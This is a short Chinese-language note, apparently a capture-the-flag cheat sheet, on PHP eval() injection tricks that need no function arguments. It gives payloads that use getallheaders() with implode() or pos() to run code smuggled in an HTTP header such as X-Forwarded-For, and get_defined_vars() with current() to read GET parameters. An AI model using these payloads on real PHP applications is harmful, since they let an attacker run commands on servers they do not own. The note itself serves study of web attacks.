一 . getallheaders()
此函数返回数组
eval()要求的参数是一个字符串impode()函数可以将数组转换为字符串
payload:
implode(getallheaders());
利用方式:随意添加一个headers,然后注释掉后面的
或者
payload:
system(pos(getallheaders()));pos() 返回数组中的当前元素的值(一般就是第一个了)在getallheaders返回的数组中X-Forwarded-For一般是第一个
直接添加headers
二 . get_defined_vars()
因为GET方式传入的参数存在该二维数组中的第一个一维数组,所以我们可以通果这个函数将其取出来。
payload:
var_dump(current(get_defined_vars()));